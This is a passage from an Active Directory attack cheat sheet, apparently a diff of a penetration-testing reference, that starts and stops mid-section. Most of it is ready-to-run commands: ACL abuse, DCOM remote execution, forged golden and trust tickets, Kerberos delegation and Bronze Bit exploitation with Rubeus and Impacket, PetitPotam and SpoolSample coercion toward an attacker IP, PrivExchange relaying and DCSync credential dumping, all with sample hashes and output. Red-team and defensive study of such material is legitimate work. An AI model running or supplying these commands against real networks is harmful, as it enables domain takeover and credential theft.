-TargetIdentity "INTERESTING_GROUP" -Rights WriteMembers -PrincipalIdentity User1 + net group "INTERESTING_GROUP" User1 /add /domain + ``` + Or + ```powershell + bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp + + # Remove right + bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp False + ``` + +### WriteOwner + +An attacker can update the owner of the target object. Once the object owner has been changed to a principal the attacker controls, the attacker may manipulate the object any way they see fit. This can be achieved with Set-DomainObjectOwner (PowerView module). 
+ +```powershell +Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal' +``` +Or +```powershell +bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setOwner devil_user1 target_object +``` + +This ACE can be abused for an Immediate Scheduled Task attack, or for adding a user to the local admin group. + + +### ReadLAPSPassword + +An attacker can read the LAPS password of the computer account this ACE applies to. This can be achieved with the Active Directory PowerShell module. Detail of the exploitation can be found in the [Reading LAPS Password](#reading-laps-password) section. + +```powershell +Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime' +``` +Or for a given computer +```powershell +bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes LAPS_PC$ ms-mcs-admpwd,ms-mcs-admpwdexpirationtime +``` + + +### ReadGMSAPassword + +An attacker can read the GMSA password of the account this ACE applies to. This can be achieved with the Active Directory and DSInternals PowerShell modules. + +```powershell +# Save the blob to a variable +$gmsa = Get-ADServiceAccount -Identity 'SQL_HQ_Primary' -Properties 'msDS-ManagedPassword' +$mp = $gmsa.'msDS-ManagedPassword' + +# Decode the data structure using the DSInternals module +ConvertFrom-ADManagedPasswordBlob $mp +``` +Or +```powershell +python bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes gmsaAccount$ msDS-ManagedPassword +``` + +### ForceChangePassword + +An attacker can change the password of the user this ACE applies to: +* On Windows, this can be achieved with `Set-DomainUserPassword` (PowerView module): +```powershell +$NewPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force +Set-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPassword +``` + +* On Linux: +```bash +# Using rpcclient from the Samba software suite +rpcclient -U 'attacker_user%my_password' -W DOMAIN -c "setuserinfo2 target_user 23 target_newpwd" + +# Using bloodyAD with pass-the-hash +bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B changePassword target_user target_newpwd +``` + + +## DCOM Exploitation + +> DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer. + + +* Impacket DCOMExec.py + ```ps1 + dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] [-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB] target [command ...] + dcomexec.py -share C$ -object MMC20 '/:@' + dcomexec.py -share C$ -object MMC20 '/:@' 'ipconfig' + + python3 dcomexec.py -object MMC20 -silentcommand -debug $DOMAIN/$USER:$PASSWORD\$@$HOST 'notepad.exe' + # -object MMC20 specifies that we wish to instantiate the MMC20.Application object. + # -silentcommand executes the command without attempting to retrieve the output. + ``` +* CheeseTools - https://github.com/klezVirus/CheeseTools + ```powershell + # https://klezvirus.github.io/RedTeaming/LateralMovement/LateralMovementDCOM/ + -t, --target=VALUE Target Machine + -b, --binary=VALUE Binary: powershell.exe + -a, --args=VALUE Arguments: -enc + -m, --method=VALUE Methods: MMC20Application, ShellWindows, + ShellBrowserWindow, ExcelDDE, VisioAddonEx, + OutlookShellEx, ExcelXLL, VisioExecLine, + OfficeMacro + -r, --reg, --registry Enable registry manipulation + -h, -?, --help Show Help + + Current Methods: MMC20.Application, ShellWindows, ShellBrowserWindow, ExcelDDE, VisioAddonEx, OutlookShellEx, ExcelXLL, VisioExecLine, OfficeMacro. 
+ ``` +* Invoke-DCOM - https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Invoke-DCOM.ps1 + ```powershell + Import-Module .\Invoke-DCOM.ps1 + Invoke-DCOM -ComputerName '10.10.10.10' -Method MMC20.Application -Command "calc.exe" + Invoke-DCOM -ComputerName '10.10.10.10' -Method ExcelDDE -Command "calc.exe" + Invoke-DCOM -ComputerName '10.10.10.10' -Method ServiceStart "MyService" + Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellBrowserWindow -Command "calc.exe" + Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellWindows -Command "calc.exe" + ``` + + +### DCOM via MMC Application Class + +This COM object (MMC20.Application) allows you to script components of MMC snap-in operations. there is a method named **"ExecuteShellCommand"** under **Document.ActiveView**. + +```ps1 +PS C:\> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1")) +PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\calc.exe",$null,$null,7) +PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",$null,"-enc DFDFSFSFSFSFSFSFSDFSFSF < Empire encoded string > ","7") + +# Weaponized example with MSBuild +PS C:\> [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1")).Document.ActiveView.ExecuteShellCommand("c:\windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",$null,"\\10.10.10.2\webdav\build.xml","7") +``` + +Invoke-MMC20RCE : https://raw.githubusercontent.com/n0tty/powershellery/master/Invoke-MMC20RCE.ps1 + +### DCOM via Office + +* Excel.Application + * DDEInitiate + * RegisterXLL +* Outlook.Application + * CreateObject->Shell.Application->ShellExecute + * CreateObject->ScriptControl (office-32bit only) +* Visio.InvisibleApp (same as Visio.Application, but should not show the Visio window) + * Addons + * ExecuteLine +* Word.Application + * RunAutoMacro + + +```ps1 +# Powershell script that injects 
shellcode into excel.exe via ExecuteExcel4Macro through DCOM +Invoke-Excel4DCOM64.ps1 https://gist.github.com/Philts/85d0f2f0a1cc901d40bbb5b44eb3b4c9 +Invoke-ExShellcode.ps1 https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a + +# Using Excel DDE +PS C:\> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName")) +PS C:\> $excel.DisplayAlerts = $false +PS C:\> $excel.DDEInitiate("cmd", "/c calc.exe") + +# Using Excel RegisterXLL +# Can't be used reliably with a remote target +Require: reg add HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations /v AllowsNetworkLocations /t REG_DWORD /d 1 +PS> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName")) +PS> $excel.RegisterXLL("EvilXLL.dll") + +# Using Visio +$visio = [activator]::CreateInstance([type]::GetTypeFromProgID("Visio.InvisibleApp", "$ComputerName")) +$visio.Addons.Add("C:\Windows\System32\cmd.exe").Run("/c calc") + +``` + +### DCOM via ShellExecute + +```ps1 +$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"10.10.10.1") +$obj = [System.Activator]::CreateInstance($com) +$item = $obj.Item() +$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) +``` + +### DCOM via ShellBrowserWindow + +:warning: Windows 10 only, the object doesn't exists in Windows 7 + +```ps1 +$com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"10.10.10.1") +$obj = [System.Activator]::CreateInstance($com) +$obj.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) +``` + +## Trust relationship between domains + +* One-way + * Domain B trusts A + * Users in Domain A can access resources in Domain B + * Users in Domain B cannot access resources in Domain A +* Two-way + * Domain A trusts Domain B + * Domain B trusts Domain A + * Authentication requests can be passed between the two domains in both directions + 
+### Enumerate trusts between domains + +* Native `nltest` + ```powershell + nltest /trusted_domains + ``` +* PowerShell `GetAllTrustRelationships` + ```powershell + ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() + + SourceName TargetName TrustType TrustDirection + ---------- ---------- --------- -------------- + domainA.local domainB.local TreeRoot Bidirectional + ``` +* Crackmapexec module `enum_trusts` + ```powershell + cme ldap -u -p -M enum_trusts + ``` + +### Exploit trusts between domains + +:warning: Require a Domain-Admin level access to the current domain. + +| Source | Target | Technique to use | Trust relationship | +|---|---|---|---| +| Root | Child | Golden Ticket + Enterprise Admin group (Mimikatz /groups) | Inter Realm (2-way) | +| Child | Child | SID History exploitation (Mimikatz /sids) | Inter Realm Parent-Child (2-way) | +| Child | Root | SID History exploitation (Mimikatz /sids) | Inter Realm Tree-Root (2-way) | +| Forest A | Forest B | PrinterBug + Unconstrained delegation ? | Inter Realm Forest or External (2-way) | + + + +## Child Domain to Forest Compromise - SID Hijacking + +Most trees are linked with dual sided trust relationships to allow for sharing of resources. +By default the first domain created if the Forest Root. + +**Requirements**: +- KRBTGT Hash +- Find the SID of the domain + ```powershell + $ Convert-NameToSid target.domain.com\krbtgt + S-1-5-21-2941561648-383941485-1389968811-502 + + # with Impacket + lookupsid.py domain/user:password@10.10.10.10 + ``` +- Replace 502 with 519 to represent Enterprise Admins +- Create golden ticket and attack parent domain. 
+ ```powershell + kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt + ``` + +## Forest to Forest Compromise - Trust Ticket + +* Require: SID filtering disabled + +From the DC, dump the hash of the `currentdomain\targetdomain$` trust account using Mimikatz (e.g. with LSADump or DCSync). Then, using this trust key and the domain SIDs, forge an inter-realm TGT using +Mimikatz, adding the SID for the target domain's enterprise admins group to our **SID history**. + +### Dumping trust passwords (trust keys) + +> Look for the trust name with a dollar ($) sign at the end. Most of the accounts with a trailing **$** are computer accounts, but some are trust accounts. + +```powershell +lsadump::trust /patch + +or find the TRUST_NAME$ machine account hash +``` + +### Create a forged trust ticket (inter-realm TGT) using Mimikatz + +```powershell +mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... /rc4:HASH_TRUST$ /user:Administrator /service:krbtgt /target:external.com /ticket:c:\temp\trust.kirbi +mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi +``` + +### Use the Trust Ticket file to get a ST for the targeted service + +```powershell +.\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local +.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt +``` + +Inject the ST file and access the targeted service with the spoofed rights. 
+ +```powershell +kirbikator lsa .\ticket.kirbi +ls \\machine.domain.local\c$ +``` + +## Privileged Access Management (PAM) Trust + +> PAM (Privileged access managment) introduces bastion forest for management, Shadow Security Principals (groups mapped to high priv groups of managed forests). These allow management of other forests without making changes to groups or ACLs and without interactive logon. + +Requirements: +* Windows Server 2016 or earlier + +If we compromise the bastion we get `Domain Admins` privileges on the other domain + +* Default configuration for PAM Trust + ```ps1 + # execute on our forest + netdom trust lab.local /domain:bastion.local /ForestTransitive:Yes + netdom trust lab.local /domain:bastion.local /EnableSIDHistory:Yes + netdom trust lab.local /domain:bastion.local /EnablePIMTrust:Yes + netdom trust lab.local /domain:bastion.local /Quarantine:No + # execute on our bastion + netdom trust bastion.local /domain:lab.local /ForestTransitive:Yes + ``` +* Enumerate PAM trusts + ```ps1 + # Detect if current forest is PAM trust + Import ADModule + Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)} + + # Enumerate shadow security principals + Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl + + # Enumerate if current forest is managed by a bastion forest + # Trust_Attribute_PIM_Trust + Trust_Attribute_Treat_As_External + Get-ADTrust -Filter {(ForestTransitive -eq $True)} + ``` +* Compromise + * Using the previously found Shadow Security Principal (WinRM account, RDP access, SQL, ...) 
+ * Using SID History +* Persistence + ```ps1 + # Add a compromised user to the group + Set-ADObject -Identity "CN=forest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=domain,DC=local" -Add @{'member'="CN=Administrator,CN=Users,DC=domain,DC=local"} + ``` + + +## Kerberos Unconstrained Delegation + +> The user sends a ST to access the service, along with their TGT, and then the service can use the user's TGT to request a ST for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html + +> When a user authenticates to a computer that has unrestricted kerberos delegation privilege turned on, authenticated user's TGT ticket gets saved to that computer's memory. + +:warning: Unconstrained delegation used to be the only option available in Windows 2000 + +> **Warning** +> Remember to coerce to a HOSTNAME if you want a Kerberos Ticket + +### SpoolService Abuse with Unconstrained Delegation + +The goal is to gain DC Sync privileges using a computer account and the SpoolService bug. + +**Requirements**: +- Object with Property **Trust this computer for delegation to any service (Kerberos only)** +- Must have **ADS_UF_TRUSTED_FOR_DELEGATION** +- Must not have **ADS_UF_NOT_DELEGATED** flag +- User must not be in the **Protected Users** group +- User must not have the flag **Account is sensitive and cannot be delegated** + +#### Find delegation + +:warning: : Domain controllers usually have unconstrained delegation enabled. +Check the `TRUSTED_FOR_DELEGATION` property. 
+ +* [ADModule](https://github.com/samratashok/ADModule) + ```powershell + # From https://github.com/samratashok/ADModule + PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True} + ``` + +* [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) + ```powershell + $> ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10 + grep TRUSTED_FOR_DELEGATION domain_computers.grep + ``` + +* [CrackMapExec module](https://github.com/mpgn/CrackMapExec/wiki) + ```powershell + cme ldap 10.10.10.10 -u username -p password --trusted-for-delegation + ``` + +* BloodHound: `MATCH (c:Computer {unconstraineddelegation:true}) RETURN c` +* Powershell Active Directory module: `Get-ADComputer -LDAPFilter "(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -Properties DNSHostName,userAccountControl` + +#### SpoolService status + +Check if the spool service is running on the remote host + +```powershell +ls \\dc01\pipe\spoolss +python rpcdump.py DOMAIN/user:password@10.10.10.10 +``` + +#### Monitor with Rubeus + +Monitor incoming connections from Rubeus. + +```powershell +Rubeus.exe monitor /interval:1 +``` + +#### Force a connect back from the DC + +Due to the unconstrained delegation, the TGT of the computer account (DC$) will be saved in the memory of the computer with unconstrained delegation. By default the domain controller computer account has DCSync rights over the domain object. + +> SpoolSample is a PoC to coerce a Windows host to authenticate to an arbitrary server using a "feature" in the MS-RPRN RPC interface. + +```powershell +# From https://github.com/leechristensen/SpoolSample +.\SpoolSample.exe VICTIM-DC-NAME UNCONSTRAINED-SERVER-DC-NAME +.\SpoolSample.exe DC01.HACKER.LAB HELPDESK.HACKER.LAB +# DC01.HACKER.LAB is the domain controller we want to compromise +# HELPDESK.HACKER.LAB is the machine with delegation enabled that we control. 
+ +# From https://github.com/dirkjanm/krbrelayx +printerbug.py 'domain/username:password'@ + +# From https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc#gistcomment-2773689 +python dementor.py -d domain -u username -p password +``` + +If the attack worked you should get a TGT of the domain controller. + +#### Load the ticket + +Extract the base64 TGT from Rubeus output and load it to our current session. + +```powershell +.\Rubeus.exe asktgs /ticket: /service:LDAP/dc.lab.local,cifs/dc.lab.local /ptt +``` + +Alternatively you could also grab the ticket using Mimikatz : `mimikatz # sekurlsa::tickets` + +Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HACKER\krbtgt` + + +#### Mitigation + +* Ensure sensitive accounts cannot be delegated +* Disable the Print Spooler Service + + +### MS-EFSRPC Abuse with Unconstrained Delegation + +Using `PetitPotam`, another tool to coerce a callback from the targeted machine, instead of `SpoolSample`. + +```bash +# Coerce the callback +git clone https://github.com/topotam/PetitPotam +python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP +python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP + +# Extract the ticket +.\Rubeus.exe asktgs /ticket: /ptt +``` + + +## Kerberos Constrained Delegation + +> Kerberos Constrained Delegation (KCD) is a security feature in Microsoft's Active Directory (AD) that allows a service to impersonate a user or another service in order to access resources on behalf of that user or service. 
+ + +### Identify a Constrained Delegation + +* BloodHound: `MATCH p = (a)-[:AllowedToDelegate]->(c:Computer) RETURN p` +* PowerView: `Get-NetComputer -TrustedToAuth | select samaccountname,msds-allowedtodelegateto | ft` +* Native + ```powershell + Get-DomainComputer -TrustedToAuth | select -exp dnshostname + Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo + ``` + +### Exploit the Constrained Delegation + +* Impacket + ```ps1 + getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10 + ``` + +* Rubeus: S4U2 attack (S4U2self + S4U2proxy) + ```ps1 + # with a password + Rubeus.exe s4u /nowrap /msdsspn:"time/target.local" /altservice:cifs /impersonateuser:"administrator" /domain:"domain" /user:"user" /password:"password" + + # with a NT hash + Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:time/srv01.domain.com /altservice:cifs /ptt + Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt + dir \\dc.domain.com\c$ + ``` + +* Rubeus: use an existing ticket to perform a S4U2 attack to impersonate the "Administrator" + ```ps1 + # Dump ticket + Rubeus.exe tgtdeleg /nowrap + Rubeus.exe triage + Rubeus.exe dump /luid:0x12d1f7 + + # Create a ticket + Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/srv.domain.local /ticket:doIFRjCCBUKgAwIBB...BTA== /ptt + ``` + +* Rubeus : using aes256 keys + ```ps1 + # Get aes256 keys of the machine account + privilege::debug + token::elevate + sekurlsa::ekeys + + # Create a ticket + Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/srv.domain.local /user:win10x64$ /aes256:4b55f...fd82 /ptt + ``` + + +### Impersonate a domain user on a resource + +Require: +* SYSTEM level privileges on a machine configured with constrained delegation + +```ps1 +PS> 
[Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null +PS> $idToImpersonate = New-Object System.Security.Principal.WindowsIdentity @('administrator') +PS> $idToImpersonate.Impersonate() +PS> [System.Security.Principal.WindowsIdentity]::GetCurrent() | select name +PS> ls \\dc01.offense.local\c$ +``` + + +## Kerberos Resource Based Constrained Delegation + +Resource-based Constrained Delegation was introduced in Windows Server 2012. + +> The user sends a Service Ticket (ST) to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a ST for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html + +1. Import **Powermad** and **Powerview** + + ```powershell + PowerShell.exe -ExecutionPolicy Bypass + Import-Module .\powermad.ps1 + Import-Module .\powerview.ps1 + ``` + +2. Get user SID + + ```powershell + $AttackerSID = Get-DomainUser SvcJoinComputerToDom -Properties objectsid | Select -Expand objectsid + $ACE = Get-DomainObjectACL dc01-ww2.factory.lan | ?{$_.SecurityIdentifier -match $AttackerSID} + $ACE + ConvertFrom-SID $ACE.SecurityIdentifier + ``` + +3. Abuse **MachineAccountQuota** to create a computer account and set an SPN for it + + ```powershell + New-MachineAccount -MachineAccount swktest -Password $(ConvertTo-SecureString 'Weakest123*' -AsPlainText -Force) + ``` + +4. 
Rewrite DC's **AllowedToActOnBehalfOfOtherIdentity** properties + + ```powershell + $ComputerSid = Get-DomainComputer swktest -Properties objectsid | Select -Expand objectsid + $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" + $SDBytes = New-Object byte[] ($SD.BinaryLength) + $SD.GetBinaryForm($SDBytes, 0) + Get-DomainComputer dc01-ww2.factory.lan | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} + $RawBytes = Get-DomainComputer dc01-ww2.factory.lan -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity + $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0 + $Descriptor.DiscretionaryAcl + ``` + + ```ps1 + # alternative + $SID_FROM_PREVIOUS_COMMAND = Get-DomainComputer MACHINE_ACCOUNT_NAME -Properties objectsid | Select -Expand objectsid + $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$SID_FROM_PREVIOUS_COMMAND)"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0); Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} + + # alternative + StandIn_Net35.exe --computer dc01 --sid SID_FROM_PREVIOUS_COMMAND + ``` + +5. Use Rubeus to get hash from password + + ```powershell + Rubeus.exe hash /password:'Weakest123*' /user:swktest$ /domain:factory.lan + [*] Input password : Weakest123* + [*] Input username : swktest$ + [*] Input domain : factory.lan + [*] Salt : FACTORY.LANswktest + [*] rc4_hmac : F8E064CA98539B735600714A1F1907DD + [*] aes128_cts_hmac_sha1 : D45DEADECB703CFE3774F2AA20DB9498 + [*] aes256_cts_hmac_sha1 : 0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 + [*] des_cbc_md5 : BA297CFD07E62A5E + ``` + +6. 
Impersonate domain admin using our newly created machine account + + ```powershell + .\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap + .\Rubeus.exe s4u /user:swktest$ /aes256:0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap + + [*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan' + [*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5) + [*] Building S4U2proxy request for service: 'cifs/dc01-ww2.factory.lan' + [*] Sending S4U2proxy request + [+] S4U2proxy success! + [*] base64(ticket.kirbi) for SPN 'cifs/dc01-ww2.factory.lan': + + doIGXDCCBligAwIBBaEDAgEWooIFXDCCBVhhggVUMIIFUKADAgEFoQ0bC0ZBQ1RPUlkuTEFOoicwJaAD + AgECoR4wHBsEY2lmcxsUZGMwMS[...]PMIIFC6ADAgESoQMCAQOiggT9BIIE + LmZhY3RvcnkubGFu + + [*] Action: Import Ticket + [+] Ticket successfully imported! + ``` + +## Kerberos Service for User Extension + +* Service For User To Self which allows a service to obtain a TGS on behalf of another user +* Service For User To Proxy which allows a service to obtain a TGS on behalf of another user on another service + +### S4U2self - Privilege Escalation + +1. Get a TGT + * Using Unconstrained Delegation + * Using the current machine account: `Rubeus.exe tgtdeleg /nowrap` +2. Use that TGT to make a S4U2self request in order to obtain a Service Ticket as domain admin for the machine. 
+ ```ps1 + Rubeus.exe s4u /self /nowrap /impersonateuser:"Administrator" /altservice:"cifs/srv001.domain.local" /ticket:"base64ticket" + Rubeus.exe ptt /ticket:"base64ticket" + + Rubeus.exe s4u /self /nowrap /impersonateuser:"Administrator" /altservice:"cifs/srv001" /ticket:"base64ticket" /ptt + ``` + +The "Network Service" account and the AppPool identities can act as the computer account in terms of Active Directory, they are only restrained locally. Therefore it is possible to invoke S4U2self if you run as one of these and request a service ticket for any user (e.g. someone with local admin rights, like DA) to yourself. + +```ps1 +# The Rubeus execution will fail when trying the S4UProxy step, but the ticket generated by S4USelf will be printed. +Rubeus.exe s4u /user:${computerAccount} /msdsspn:cifs/${computerDNS} /impersonateuser:${localAdmin} /ticket:${TGT} /nowrap +# The service name is not included in the TGS ciphered data and can be modified at will. +Rubeus.exe tgssub /ticket:${ticket} /altservice:cifs/${ServerDNSName} /ptt +``` + + +## Kerberos Bronze Bit Attack - CVE-2020-17049 + +> An attacker can impersonate users which are not allowed to be delegated. This includes members of the **Protected Users** group and any other users explicitly configured as **sensitive and cannot be delegated**. + +> Patch is out on November 10, 2020, DC are most likely vulnerable until [February 2021](https://support.microsoft.com/en-us/help/4598347/managing-deployment-of-kerberos-s4u-changes-for-cve-2020-17049). 
+ +:warning: Patched Error Message : `[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)` + +Requirements: +* Service account's password hash +* Service account's with `Constrained Delegation` or `Resource Based Constrained Delegation` +* [Impacket PR #1013](https://github.com/SecureAuthCorp/impacket/pull/1013) + +**Attack #1** - Bypass the `Trust this user for delegation to specified services only – Use Kerberos only` protection and impersonate a user who is protected from delegation. + +```powershell +# forwardable flag is only protected by the ticket encryption which uses the service account's password +$ getST.py -spn cifs/Service2.test.local -impersonate Administrator -hashes -aesKey test.local/Service1 -force-forwardable -dc-ip # -> Forwardable + +$ getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes aad3b435b51404eeaad3b435b51404ee:7c1673f58e7794c77dead3174b58b68f -aesKey 4ffe0c458ef7196e4991229b0e1c4a11129282afb117b02dc2f38f0312fc84b4 test.local/Service1 -force-forwardable + +# Load the ticket +.\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit + +# Access "c$" +ls \\service2.test.local\c$ +``` + +**Attack #2** - Write Permissions to one or more objects in the AD + +```powershell +# Create a new machine account +Import-Module .\Powermad\powermad.ps1 +New-MachineAccount -MachineAccount AttackerService -Password $(ConvertTo-SecureString 'AttackerServicePassword' -AsPlainText -Force) +.\mimikatz\mimikatz.exe "kerberos::hash /password:AttackerServicePassword /user:AttackerService /domain:test.local" exit + +# Set PrincipalsAllowedToDelegateToAccount +Install-WindowsFeature RSAT-AD-PowerShell +Import-Module ActiveDirectory +Get-ADComputer AttackerService +Set-ADComputer Service2 -PrincipalsAllowedToDelegateToAccount AttackerService$ +Get-ADComputer Service2 -Properties PrincipalsAllowedToDelegateToAccount + +# Execute the attack +python .\impacket\examples\getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes 
830f8df592f48bc036ac79a2bb8036c5:830f8df592f48bc036ac79a2bb8036c5 -aesKey 2a62271bdc6226c1106c1ed8dcb554cbf46fb99dda304c472569218c125d9ffc test.local/AttackerService -force-forwardableet-ADComputer Service2 -PrincipalsAllowedToDelegateToAccount AttackerService$ + +# Load the ticket +.\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit | Out-Null +``` + +## PrivExchange attack + +Exchange your privileges for Domain Admin privs by abusing Exchange. +:warning: You need a shell on a user account with a mailbox. + + +1. Exchange server hostname or IP address + + ```bash + pth-net rpc group members "Exchange Servers" -I dc01.domain.local -U domain/username + ``` + + +2. Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket). + + ```powershell + ntlmrelayx.py -t ldap://dc01.domain.local --escalate-user username + ``` + + +3. Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server. Forcing the Exchange server's to send back its NTLMv2 hash to a controlled machine. + + ```bash + # https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py + python privexchange.py -ah xxxxxxx -u xxxx -d xxxxx + python privexchange.py -ah 10.0.0.2 mail01.domain.local -d domain.local -u user_exchange -p pass_exchange + + # https://github.com/G0ldenGunSec/PowerPriv + powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016 + ``` + +4. Profit using secretdumps from Impacket, the user can now perform a dcsync and get another user's NTLM hash + + ```bash + python secretsdump.py xxxxxxxxxx -just-dc + python secretsdump.py lab/buff@192.168.0.2 -ntds ntds -history -just-dc-ntlm + ``` + +5. 
Clean your mess and restore a previous state of the user's ACL + + ```powershell + python aclpwn.py --restore ../aclpwn-20190319-125741.restore + ``` + +Alternatively you can use the Metasploit module + +[`use auxiliary/scanner/http/exchange_web_server_pushsubscription`](https://github.com/rapid7/metasploit-framework/pull/11420) + +Alternatively you can use an all-in-one tool : Exchange2domain. + +```powershell +git clone github.com/Ridter/Exchange2domain +python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip +python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip +``` + +## SCCM Deployment + +> SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation. + +* [PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM) +* [MalSCCM - Abuse local or remote SCCM servers to deploy malicious 